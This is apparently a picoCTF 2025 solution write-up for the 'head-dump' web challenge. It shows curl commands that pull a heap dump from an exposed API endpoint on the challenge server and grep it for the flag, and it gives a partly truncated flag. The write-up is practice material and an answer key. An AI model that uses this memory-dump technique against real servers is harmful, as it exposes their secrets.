picoCTF SolutionsChallenge library
picoCTF 2025Web ExploitationEasy

head-dump

Challenge Overview

Welcome to the challenge! In this challenge, you will explore a web application and find an endpoint that exposes a file containing a hidden flag.
The application is a simple blog website where you can read articles about various topics, including an article about API Documentation. Your goal is to explore the application and find the endpoint that generates files holding the server’s memory, where a secret flag is hidden.
The website is running picoCTF News.

Solution

Go to api documention scroll down click head dump and try it out then run the command and grep for picoctf or put it into a file then grep:

curl -X 'GET' \
  'http://verbal-sleep.picoctf.net:63972/heapdump' \
  -H 'accept: */*'

Or you can just do:

curl http://verbal-sleep.picoctf.net:63972/heapdump | grep pico

Flag: picoCTF{Pat!3nt_15_Th3_K3y_ad7e...}